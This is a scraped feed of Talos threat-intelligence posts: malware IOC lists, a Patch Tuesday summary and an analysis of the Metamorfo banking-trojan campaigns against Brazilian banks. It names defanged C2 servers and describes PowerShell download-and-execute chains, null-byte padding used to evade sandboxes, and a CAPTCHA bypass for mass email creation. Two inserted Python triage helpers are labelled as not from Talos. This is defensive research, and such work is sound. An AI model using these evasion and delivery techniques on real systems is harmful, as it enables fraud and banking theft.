  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ffengh.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hfsrfgs.exe
  • %LocalAppData%\Temp\ffengh.exe
  • hfsrfgs.exe
File Hashes
  • 1b806d44ead6688b22e623a1d50ad910af73b6ebe274901cccff8aabd526e3dd
  • 1df5a1477102ad9d32a976eea0af04b7c63a660fefc39a8c2c524e8cfa9634e3
  • 2e09c458bc34495f4390b2783d17369a2f809860eb95b95ff914c6610fd42ab0
  • 56db7b1dd0bcbeca631eee556146fb599fc363466f51ec01eae28ecd4289e838
  • 61e96310f388db546db48b6b8d81958264647add9f7cc880067cd6f875b5b4f9
  • 64c1bb68e91d30812c0ea2690a4bb15d2788b43ec6c54aa9672de758ee7e5042
  • 71dfc74d26d696f74b65c03c93a9118b9c62e5adfb6c93a5e15d00dcb50d585f
  • 7a305e442718a07f2ddcc7ae9a8983c49be3247c123b06dabcf7d48d3a4bdcde
  • 7da8dd2d31ad4ed61c87b5f44e1d70bcb938d9c5ff9abbc94c8e76cf0b10f379
  • 87071c84cff348e086cb28fcfeec54daf58d728c5fb3aaa26ff4aca42fab4b4f
  • 99230cc2ba171d71a9c5bade432d53bbf1ea78be629f62b90bb73fd71a26e8a4
  • af44d4fff8ce394f9ecb9b3f9d95b8fb440a7b8f1892574f41355072ec2f0999
  • bcdfdc97d2a6f3769902d3bf55b180b4dd9efc74af345cf23a795dbdc9456b51
  • c224d27d7adf2fece2e92d4ed2f62e244e8e5bcaa98c89ade06d40b0112e6bd1
  • d7afe736ed75987b854236b451a4cb6f0642b4e9cc92f3a9a96e2b8535070d05
  • d9d107fed85d142d6a5cb4d40a48b3ddf5c61f97bc502a297f816ac902fa13a6
  • e4eddc3910aca83db9bef4bc4f11006c0ae09a1552a6266adac79dc922ffe90a
  • e6c03bfb271c97063320d079b7ed156b8eae18c75ccf5c25d5ae5cc01df62139
  • f41388706c803a31645f416804995ad881d8ee0e0de0f0c355fb87fc415de211
  • fb75875cdf989e58a80330aa43543b9ab3765fde077174729e2011555cd295d9

Screenshots of Detection
AMP



Indicators of Compromise
Registry Keys
    • Value Name: ObjectName
Mutexes
  • Global\I98B68E3C
  • Global\M98B68E3C
  • PEM19C
  • PEM52C
  • PEM748
  • PEM43C
  • PEM20C
IP Addresses contacted by malware. Does not indicate maliciousness
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • N/A
File Hashes

Screenshots of Detection (AMP)


Beers with Talos Ep. #41: Sextortion, money and malware

Wed, 14/11/2018 - 14:38

Beers with Talos (BWT) Podcast Ep. #41 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.
Ep. #41 show notes: Recorded Nov. 9, 2018 — We tried to make this episode last week, but thanks to some technical difficulties, we ended up calling that one a practice run. Here is take two, focused on recent sextortion scams and the pending machine learning apocalypse. We also review why vulnerability discovery and red teams are the most important line items in your security budget by looking at a recent story where a breach cost dozens of lives.
The timeline:
The topics
00:38 — Roundtable: We are now trivia-worthy
12:25 — Persian Stalker and on down the mobile rabbit hole
22:45 — The anatomy of sextortion scams
31:32 — Machine learning and the malware wars
45:20 — Vulnerability discovery: Why our 200-vuln milestone is both important and amazing
52:32 — Save the red team, CIA covert comms cover blown
1:02:49 — Closing thoughts and parting shots
The links

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff).
Find all episodes here.

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics:
[email protected]

Microsoft Patch Tuesday — November 2018: Vulnerability disclosures and Snort coverage

Tue, 13/11/2018 - 16:53
Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 53 vulnerabilities: 11 rated "critical," 40 rated "important," one rated "moderate" and one rated "low."

The advisories cover bugs in the Chakra scripting engine, Microsoft Outlook and DirectX.

This update also includes three advisories. One covers vulnerabilities in Adobe Flash Player, and another covers important bugs in the Microsoft Surface tablet. Additionally, there is guidance for how users should configure BitLocker in order to properly enforce software encryption.

For more on our coverage for these vulnerabilities, check out the SNORTⓇ blog post here.

Critical vulnerabilities
Microsoft disclosed 11 critical vulnerabilities this month, which we will highlight below. There is also a critical advisory covering Adobe Flash Player.

CVE-2018-8541, CVE-2018-8542, CVE-2018-8543, CVE-2018-8551, CVE-2018-8555, CVE-2018-8556, CVE-2018-8557 and CVE-2018-8588 are all memory corruption vulnerabilities in the Chakra scripting engine. They all lie in the way that the scripting engine handles objects in memory in the Microsoft Edge internet browser. These vulnerabilities could corrupt memory in a way that an attacker could execute code in the context of the current user. An attacker needs to convince a user to open a specially crafted, malicious website on Microsoft Edge in order to exploit these bugs.

CVE-2018-8476 is a remote code execution vulnerability in the Windows Deployment Services TFTP server. The bug lies in the way the TFTP server handles objects in memory. An attacker could exploit this vulnerability by supplying the user with a specially crafted request.

CVE-2018-8553 is a remote code execution vulnerability in Microsoft Graphics Components that lies in the way Graphics Components handles objects in memory. An attacker can exploit this vulnerability by providing the user with a specially crafted file.

CVE-2018-8544 is a remote code execution vulnerability that exists in the way that the VBScript engine handles objects in memory. An attacker needs to trick a user into visiting a specially crafted website on Internet Explorer in order to exploit this vulnerability. Alternatively, the attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts Internet Explorer’s rendering engine.

ADV180025 addresses several vulnerabilities in Adobe Flash Player, which are outlined by Adobe in a separate release. Microsoft recommends updating to the latest version of Flash Player, as well as disabling Flash on its web browsers.

Important vulnerabilities
There are also 40 important vulnerabilities in this release. We would like to specifically highlight seven of them.

CVE-2018-8256 is a remote code execution vulnerability in PowerShell when it improperly handles specially crafted files. An attacker could execute malicious code on a vulnerable system. This update fixes the vulnerability by ensuring that PowerShell properly handles files.

CVE-2018-8574 and CVE-2018-8577 are remote code execution vulnerabilities in Microsoft Excel that occur when the software fails to properly handle objects in memory. An attacker could exploit these bugs by tricking the user into opening a specially crafted Excel file, either as an email attachment or by another method.

CVE-2018-8582 is a remote code execution vulnerability in Microsoft Outlook when the software fails to properly parse specially modified rule export files. Users who have their settings configured to allow fewer user rights are less impacted by this vulnerability than those who operate with administrative user rights. Workstations and terminal servers that use Microsoft Outlook are also at risk. An attacker needs to convince a user to open a specially crafted rule export file in an email in order to trigger this bug.

CVE-2018-8450 is a remote code execution vulnerability that exists when Windows Search handles objects in memory. An attacker could trigger this vulnerability by sending a specially crafted function to the Windows Search service, or via an SMB connection.

CVE-2018-8550 is an elevation of privilege in Windows COM Aggregate Marshaler. An attacker who successfully exploits the vulnerability could run arbitrary code with elevated privileges. The vulnerability does not directly allow the user to execute arbitrary code, but it could be used in conjunction with other bugs to execute code with elevated privileges.

CVE-2018-8570 is a remote code execution vulnerability in Internet Explorer that exists when the web browser improperly accesses objects in memory. An attacker could exploit this bug by hosting a malicious website and convincing the user to visit the link in Internet Explorer.

The other important vulnerabilities are:
Moderate vulnerabilities
The one moderate vulnerability is CVE-2018-8546, a denial-of-service vulnerability in the Skype video messaging service.

Low vulnerability
There is also one low-rated vulnerability, CVE-2018-8416, which is a tampering vulnerability in the .NET Core.

Coverage
In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on

Snort rules: 32637, 45142, 45143, 48399 - 48404, 48374 - 48388, 48393 - 48395, 48360 - 48373, 48408 - 48410

Threat Roundup for November 2 to November 9

Fri, 09/11/2018 - 14:50

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 02 and Nov. 09. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, or

You can find an additional JSON file here that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

  • Doc.Malware.00536d-6741783-0
    Doc.Malware.00536d-6741783-0 is a family of malicious documents that leverage obfuscated VBA and PowerShell scripts to download malicious binaries from the internet and infect the system. These documents use WMI techniques to launch the downloaded binaries and can deliver different types of payloads.
  • Win.Malware.Nymaim-6742391-0
    Win.Malware.Nymaim-6742391-0 is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
  • Doc.Malware.00536d-6741218-0
    Doc.Malware.00536d-6741218-0 is the name given to a set of malicious documents that leverage VBA and PowerShell to install malware on the system. These documents usually convince the user to enable macros that, if executed, download and install additional malware on the system.
  • Win.Trojan.Gamarue-6739927-0
    Win.Trojan.Gamarue-6739927-0 covers a family that, after installing itself on the system to survive after reboot, will spread itself to USB drives and modify system configuration settings to weaken its security and disable certain features, such as the task manager or the Windows shell, in order to protect itself. It can exfiltrate sensitive data and receive additional commands.
  • Win.Malware.Mikey-6739644-0
    Win.Malware.Mikey-6739644 is a trojan that installs itself on the system, collects information and communicates with a C2 server, potentially exfiltrating sensitive information. These types of threats can also receive additional commands and perform other malicious actions on the system such as installing additional malware upon request.
  • Win.Worm.Brontok-6739140-0
    Win.Worm.Brontok is an email worm that can copy itself onto USB drives. It can change system configuration to weaken its security settings, conduct distributed denial-of-service attacks, and perform other malicious actions on the infected systems.
  • Win.Trojan.Autoruner-6733593-0
    Autorunner is in the Esfury family. Esfury is a type of worm that commonly spreads via removable drives or platforms with user interaction (e.g. emails, instant messages, web pages). When executed, Esfury modifies multiple registry keys in order to execute when certain Windows applications are opened, including security products, registry editor and task manager. Esfury may also contact a remote server to download and execute arbitrary files.
  • Doc.Downloader.Emotet-6744157-1
    Emotet is a banking trojan that has remained relevant due to its continual evolution to bypass antivirus products.
Indicators of Compromise
Registry Keys
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\CA
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Disallowed
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Root
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\TrustedPeople
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\trust
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 92[.]242[.]63[.]202
Domain Names contacted by malware. Does not indicate maliciousness
  • nosenessel[.]com
Files and or directories created
  • %AppData%\Microsoft\Word\STARTUP
  • %AppData%\Microsoft\Office\Recent\349314338.doc.LNK
  • %LocalAppData%\Temp\icn3tzqs.qav.psm1
  • %LocalAppData%\Temp\lgisqtyq.v2z.ps1
  • %AppData%\1bb228b0.exe
File Hashes

Screenshots of Detection (AMP)




Indicators of Compromise
Registry Keys
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\fro.dfx
  • %SystemDrive%\Documents and Settings\All Users\pxs\pil.ohu
File Hashes

Screenshots of Detection (AMP)


Indicators of Compromise
Registry Keys
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\CA
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Disallowed
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Root
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\TrustedPeople
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\trust
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 92[.]242[.]63[.]202
  • 95[.]181[.]198[.]72
Domain Names contacted by malware. Does not indicate maliciousness
  • 222[.]222[.]67[.]208[.]in-addr[.]arpa
  • suggenesse[.]com
  • legicalpan[.]com
  • gulamicros[.]com
Files and or directories created
  • %LocalAppData%\Temp\5jootfr4.adu.ps1
  • %LocalAppData%\Temp\e2dn4nhu.cmdline
  • %LocalAppData%\Temp\uju0ohji.0.cs
  • %LocalAppData%\Temp\uju0ohji.cmdline
  • %LocalAppData%\Temp\uju0ohji.dll
  • %LocalAppData%\Temp\e2dn4nhu.dll
File Hashes

Screenshots of Detection (AMP)




Indicators of Compromise
Registry Keys
  • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
  • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\
    • Value Name: CustomPropertyHwIdKey
  • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • \Autorun.inf
  • %LocalAppData%\Temp\wmsetup.log
  • \??\E:\Autorun.inf
  • %LocalAppData%\Temp\NoPorn.exe
  • %LocalAppData%\Temp\mplayerc.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\NoPorn.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mplayerc.exe
File Hashes

Screenshots of Detection (AMP)


Indicators of Compromise
Registry Keys
  • <HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
  • <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
    • Value Name: CachePrefix
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • statsrichwork[.]com
Files and or directories created
  • files\information.txt
  • files\passwords.txt
File Hashes

Screenshots of Detection (AMP)



Indicators of Compromise
Registry Keys
  • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\
  • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\winlogon\
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
File Hashes

Screenshots of Detection (AMP)


Indicators of Compromise
Registry Keys
    • Value Name: Debugger
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
Domain Names contacted by malware. Does not indicate maliciousness
Files and or directories created
  • \??\E:\autorun.inf
  • %UserProfile%\27F6471627473796E696D64614\winlogon.exe
File Hashes

Screenshots of Detection (AMP)


Indicators of Compromise
Registry Keys
    • Value Name: Type
    • Value Name: Start
    • Value Name: ErrorControl
    • Value Name: ImagePath
    • Value Name: DisplayName
    • Value Name: WOW64
    • Value Name: ObjectName
    • Value Name: Description
Mutexes
  • Global\I98B68E3C
  • Global\M98B68E3C
IP Addresses contacted by malware. Does not indicate maliciousness
  • 182[.]180[.]77[.]215
  • 45[.]59[.]204[.]133
  • 67[.]177[.]71[.]77
  • 87[.]229[.]45[.]35
Domain Names contacted by malware. Does not indicate maliciousness
  • lionhomesystem[.]hu
Files and or directories created
  • %AppData%\Microsoft\UProof\CUSTOM.DIC
  • %SystemDrive%\TEMP\~$18_11Informationen_betreffend_Transaktion.doc
  • %SystemDrive%\~$9441806.doc
  • %LocalAppData%\Temp\781.exe
  • %LocalAppData%\Temp\mq0dgaud.vrd.psm1
  • %LocalAppData%\Temp\xxlgesic.vav.ps1
  • %WinDir%\SysWOW64\dimcloudb.exe
  • %WinDir%\TEMP\9E64.tmp
  • %LocalAppData%\Temp\CVRF911.tmp
File Hashes

Screenshots of Detection (AMP)




Metamorfo Banking Trojan Keeps Its Sights on Brazil

Thu, 08/11/2018 - 15:09
This blog post was authored by Edmund Brumaghin, Warren Mercer, Paul Rascagneres, and Vitor Ventura.

Executive Summary
Financially motivated cybercriminals have used banking trojans for years to steal sensitive financial information from victims. They are often created to gather credit card information and login credentials for various online banking and financial services websites so this data can be monetized by the attackers. Cisco Talos recently identified two ongoing malware distribution campaigns being used to infect victims with banking trojans, specifically financial institutions' customers in Brazil. Additionally, during the analysis of these campaigns, Talos identified a dedicated spam botnet that is currently delivering malicious spam emails as part of the infection process.

Distribution campaigns
While analyzing these campaigns, Talos identified two separate infection processes that we believe attackers have used between late October and early November. These campaigns used different file types for the initial download and infection process, and ultimately delivered two separate banking trojans that target Brazilian financial institutions. Both campaigns used the same naming convention for various files used during the infection process and featured the abuse of link-shortening services to obscure the actual distribution servers used. The use of link shorteners also allows some additional flexibility. Many organizations allow their employees to access link shorteners from corporate environments, which could enable the attacker to shift where they are hosting malicious files, while also enabling them to leverage these legitimate services in email-based campaigns.

Campaign 1
Talos identified a spam campaign using a zipped file hosted on a free web hosting platform. This archive contains a Windows LNK file (Link). During this campaign, the filename followed the following format:

"," where "XXXXXXXXXX" is a 10-digit numeric value.

The LNK file format was:

"__Fatura pendente - XXXX.lnk," where "XXXX" is a four-digit alphanumeric value.

The purpose of the LNK file was to download a PowerShell script with an image filename extension (.bmp or .png):

The purpose of this command is to download and execute a PowerShell script from the attacker's URL. This new PowerShell script is also obfuscated:

This script is used to download an archive hosted on Amazon Web Services (AWS):


This archive contains two files:

  • A dynamic library (.DLL)
  • A compressed payload (.PRX)

The library decompresses the PRX file and executes it in a remote process (library injection). This injected code is the final payload described later in this post.
Campaign 2
In addition to the infection process described in Campaign 1, Talos also observed a second series of campaigns that leveraged a different process to deliver and execute malware on victim systems. This campaign also appeared to target Portuguese-speaking victims.

In this series of campaigns, attackers leveraged malicious PE32 executables to perform the initial stage of the infection process rather than Windows shortcut files (LNK). These PE32 executables were delivered in ZIP archives using the following naming convention:

"," where "XXXXXXXXXX" is a 10-digit numeric value.

A PE32 executable is inside of the ZIP archive. These executables used the following naming convention:

"__Fatura pendente - XXXX.exe," where "XXXX" is a four-digit alphanumeric value.

When executed, these PE32 files are used to create a batch file in a subdirectory of %TEMP%.

The Windows Command Processor is then used to execute the batch file which, in turn, executes PowerShell with the instructions to download the contents hosted on the attacker-controlled server and pass it to the Invoke-Expression (IEX) using the following syntax:

The batch file is then deleted and the infection process continues.

When the system reaches out to Bitly, the link shortener, to access the contents hosted at the shortened link destination, an HTTP redirection redirects the client to the attacker-controlled server hosting a PowerShell script that is passed into IEX and executed as previously described. The server delivers the following PowerShell:

This PowerShell script retrieves and executes the malicious payload that is being delivered to the system. This PowerShell also leverages the Bitly service, as seen in the previous screenshot.

With Bitly links, users can obtain some further information by adding the "+" sign to the end of the shortened URL. By doing this, we discovered that the link was created on Oct. 21, most likely around the campaign start time, and that 699 clicks had been registered through the Bitly service so far.

While the HTTP request is made for a JPEG and the content type specified is "image/jpeg," the server actually delivers a ZIP archive containing a Windows DLL file called "b.dll."

The script then sleeps for 10 seconds, after which it extracts the archive and saves the DLL to a subdirectory of %APPDATA% on the system. RunDLL32 is then used to execute the malware, infecting the system. The uncompressed DLL is very large, approximately 366MB in size, due to the inclusion of a large number of 0x00 bytes within the binary. This may have been used to evade automated detection and analysis systems, as many will not properly process large files. Similarly, this will avoid sandbox detonation, as most sandboxes will not allow files of this size.
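The null-padding evasion described above can be triaged mechanically. The following helpers are an added example, not Talos code or anything from the malware: they measure how much of a file is 0x00 padding, flag large mostly-zero files, and produce a trimmed copy for size-limited tooling. The thresholds, the sample body and the padded size are assumptions constructed for the demonstration.

```python
"""Triage helpers for oversized, null-padded binaries (added example)."""
import re
import zlib

NULL_RATIO_THRESHOLD = 0.90           # assumption: >90% zero bytes means padding
LARGE_FILE_BYTES = 100 * 1024 * 1024  # assumption: a typical sandbox size limit

_NULL_RUN = re.compile(rb"\x00+")


def null_byte_ratio(data: bytes) -> float:
    """Fraction of the buffer that is 0x00 (0.0 for an empty buffer)."""
    return data.count(0) / len(data) if data else 0.0


def longest_null_run(data: bytes) -> int:
    """Length of the longest contiguous run of 0x00 bytes."""
    return max((m.end() - m.start() for m in _NULL_RUN.finditer(data)), default=0)


def compressed_ratio(data: bytes) -> float:
    """zlib-compressed size over raw size; zero padding compresses to almost nothing."""
    if not data:
        return 1.0
    return len(zlib.compress(data, 6)) / len(data)


def strip_trailing_nulls(data: bytes) -> bytes:
    """Copy of the buffer with its trailing 0x00 run removed.

    Only trailing bytes are cut, so headers and offsets that point inside
    the real content stay valid. This is a triage copy for tools with size
    limits, not a replacement for the original sample.
    """
    return data.rstrip(b"\x00")


def padding_report(data: bytes, large_file_bytes: int = LARGE_FILE_BYTES,
                   null_ratio_threshold: float = NULL_RATIO_THRESHOLD) -> dict:
    """Summarise padding indicators and flag large, mostly-zero files."""
    size = len(data)
    ratio = null_byte_ratio(data)
    return {
        "size": size,
        "null_ratio": ratio,
        "longest_null_run": longest_null_run(data),
        "compressed_ratio": compressed_ratio(data),
        "trimmed_size": len(strip_trailing_nulls(data)),
        "suspicious": size >= large_file_bytes and ratio >= null_ratio_threshold,
    }


def build_padded_sample(content: bytes, padded_size: int) -> bytes:
    """Constructed test input: a small non-zero body followed by zero padding."""
    if padded_size < len(content):
        raise ValueError("padded_size is smaller than the content")
    return content + b"\x00" * (padded_size - len(content))


if __name__ == "__main__":
    # Constructed stand-in for a padded DLL: 1022 non-zero bytes, then zeros to 2 MB.
    body = b"MZ" + bytes(range(1, 256)) * 4
    sample = build_padded_sample(body, 2 * 1024 * 1024)
    print(padding_report(sample, large_file_bytes=1024 * 1024))
```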

Additionally, infected systems beacon to an attacker-controlled server (srv99[.]tk) during the infection process.

Analysis of the DNS communications associated with this domain shows an increase in attempts to resolve this domain, which corresponds with the campaigns that have been observed.

The majority of these resolution requests have occurred from systems located in Brazil.

The PowerShell execution also facilitates communications with a dynamic DNS service. Similarly to the first Bitly link, we were able to obtain additional information in relation to this domain:

We once again see a creation time, but this time, it's a few days later. This potentially shows the actor pivoting to a different email list to send the same spam information to.
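Both campaigns share the attachment naming convention described above (a 10-digit numeric archive name wrapping a "__Fatura pendente - XXXX" file, .lnk in Campaign 1 and .exe in Campaign 2). The following triage function is an added example, not Talos code: it inspects a ZIP attachment in memory and labels it by campaign without extracting anything. The ".zip" extension on the outer archive is assumed, one or two leading underscores are accepted because the IOC list shows a single one, and the archives are constructed inline for the demonstration.

```python
"""Attachment triage for the shared file-naming convention (added example)."""
import io
import re
import zipfile
from typing import Optional

# Outer archive: 10-digit numeric name; ".zip" extension is an assumption.
OUTER_NAME_RE = re.compile(r"^\d{10}\.zip$", re.IGNORECASE)
# Inner file: one or two underscores, "Fatura pendente - ", four alphanumerics.
INNER_NAME_RE = re.compile(
    r"^_{1,2}Fatura pendente - [A-Za-z0-9]{4}\.(lnk|exe)$", re.IGNORECASE
)
# The inner file's extension tells the two infection chains apart.
CAMPAIGN_BY_EXT = {"lnk": "campaign1", "exe": "campaign2"}


def classify_entry(name: str) -> Optional[str]:
    """Return the campaign label for an archive entry name, or None."""
    match = INNER_NAME_RE.match(name.rsplit("/", 1)[-1])
    return CAMPAIGN_BY_EXT[match.group(1).lower()] if match else None


def triage_attachment(filename: str, data: bytes) -> dict:
    """Inspect a ZIP attachment without writing anything to disk.

    verdict is "campaign1" or "campaign2" when both the outer name and an
    entry match, "inner_only" when only an entry matches, otherwise None.
    """
    result = {
        "outer_match": bool(OUTER_NAME_RE.match(filename)),
        "entries": [],
        "verdict": None,
        "error": None,
    }
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                result["entries"].append((info.filename, classify_entry(info.filename)))
    except zipfile.BadZipFile:
        result["error"] = "not a zip archive"
        return result
    hits = [label for _, label in result["entries"] if label]
    if hits:
        result["verdict"] = hits[0] if result["outer_match"] else "inner_only"
    return result


def build_sample_zip(entry_name: str, payload: bytes = b"constructed placeholder") -> bytes:
    """Constructed test archive with a single inert entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(entry_name, payload)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed attachments mirroring the two campaigns' naming patterns.
    print(triage_attachment("1234567890.zip", build_sample_zip("_Fatura pendente - QD95.exe")))
    print(triage_attachment("0987654321.zip", build_sample_zip("__Fatura pendente - HCBF.lnk")))
```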

Spam tools
Both of these campaigns eventually deliver a banking trojan. However, Talos identified additional tools and malware hosted on the Amazon S3 Bucket. This malware is a remote administration tool with the capability to create emails. The emails are created on the BOL Online email platform, an internet portal that provides email hosting and free email services in Brazil. The attacker's main goal appears to be creating a botnet of systems dedicated to email creation.

The malware is developed in C# and contains many Portuguese words.

Here is the function used to create a BOL email:

Once created, the randomly generated username and password are sent to a C2 server. BOL Online uses a CAPTCHA system to keep machines from creating emails. To bypass this protection, the malware author uses the Recaptcha API with the token provided from the C2 server:

During our investigation, all the created emails were prefixed by "financeir."

The trojan has the capability to clean itself, send created email credentials and restart, download and execute binaries provided by the C2 server.

Talos identified three C2 servers:

  • hxxp://criadoruol[.]site/
  • hxxp://jdm-tuning[.]ru/
  • hxxp://www[.]500csgo[.]ru/

We identified more than 700 compromised systems on the servers that are members of this botnet. The oldest machine was compromised on Oct. 23. This botnet created more than 4,000 unique emails on the BOL Online service using the aforementioned technique. Some of these emails were used to initiate the spam campaigns we tracked as part of this research.

Given the filename patterns and the victimology, along with the specific targeting aspect of both campaigns, Talos assesses with moderate confidence that both of these campaigns leveraged the same email generation tool we discovered on the actor's open S3 bucket. This links both campaigns to the same actor using the same toolset. The actor likely attempted to use different delivery methods and email lists to deliver his malspam.

Final payload
We identified two different payloads deployed during these campaigns. The payloads are developed in Delphi and are banking trojans targeting Brazilian banks.

Fellow security firm FireEye already covered the first payload here. It gets information on the compromised system and exfiltrates the data to a C2 server. It also includes a keylogger, which is exactly the same as the keylogger we described in this post. When the user is logged into their bank's website, the malware can interact with them by showing a fake popup alleging to be from the bank. Here is an example that attempts to steal the user's CVV:

The second one has exactly the same features but is implemented differently. It mainly targets two-factor authentication by displaying fake popups to the user:

A keylogger then retrieves the information entered by the target.

The following financial services organizations are being targeted by this malware: Santander, Itaù, Banco do Brasil, Caixa, Sicredi, Bradesco, Safra, Sicoob, Banco da Amazonia, Banco do Nordeste, Banestes, Banrisul, Banco de Brasilia and Citi.

This strain of malware is prevalent throughout the world and is further proof that banking trojans remain popular. With this sample, the attacker targets specific Brazilian banking institutions. This could suggest the attacker is from South America, where they could find it easier to use the obtained details and credentials to carry out illicit financial activities. We will continue to monitor financial crimeware activities throughout the threat landscape. This is not a sophisticated trojan, and most banking malware rarely is, but it's the latest example of how easy it can be for criminals to steal from users by abusing spam to send their malicious payloads. This threat also shows the lengths that actors are going to in order to obtain additional emails to abuse, creating an automatic generation mechanism to get new emails for additional spam campaigns.

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on

Indicators of Compromise (IOCs)
The following IOCs are associated with various malware distribution campaigns that were observed during the analysis of associated malicious activity.

Campaign #1
Stage 1 Downloaders (LNK Shortcuts):

Stage 1 Downloaders Filenames (LNK Shortcuts):
_Fatura pendente - HCBF.lnk

Stage 2 URLs

Stage 2 Powershell

Stage 3 Archive

Stage 3 Loader

Stage 3 Compressed Payload

Stage 4 Final Payload

Campaign #2
Stage 1 PE32 Executables:

Stage 1 PE32 Filenames:
_Fatura pendente - QD95.exe
_Fatura pendente - QW2I.exe
_Fatura pendente - 9X3H.exe

Stage 1 Archive Filenames:

Stage 1 URLs:

Stage 1 Domains:

Stage 2 URLs:

Link Shorteners:

C2 Domains:

Spam tools
PE Sample:

C2 Servers:

Final Payload
PE Samples:

Persian Stalker pillages Iranian users of Instagram and Telegram

Mon, 05/11/2018 - 14:55
This blog post is authored by Danny Adamatis, Warren Mercer, Paul Rascagneres and Vitor Ventura, with contributions from Eric Kuhla.

State-sponsored actors have a number of different techniques at their disposal to remotely gain access to social media and secure messaging applications. Starting in 2017 and continuing through 2018, Cisco Talos has seen different techniques being used to attack users and steal their private information. These techniques used fake login pages, malicious apps disguised as their legitimate counterparts and BGP hijacking, and were specifically targeting Iranian users of the secure messaging app Telegram and the social media site Instagram.
Telegram has become a popular target for greyware in Iran, as the app is used by an estimated 40 million users. While it's mostly used for daily communication, protest organizers also used it in the past to organize demonstrations against the Iranian government, specifically in December 2017. In a few instances, the Iranian government asked Telegram to shut down certain channels for "promoting violence." The tactics outlined in this post have been in use since 2017 in an effort to gather information about Telegram and Instagram users. The campaigns vary in complexity, resource needs and methods. Below, we outline examples of a network attack, application clones and classic phishing. It is our belief that these campaigns were used to specifically target Iranian users of the Telegram app in an effort to steal personal and login information.

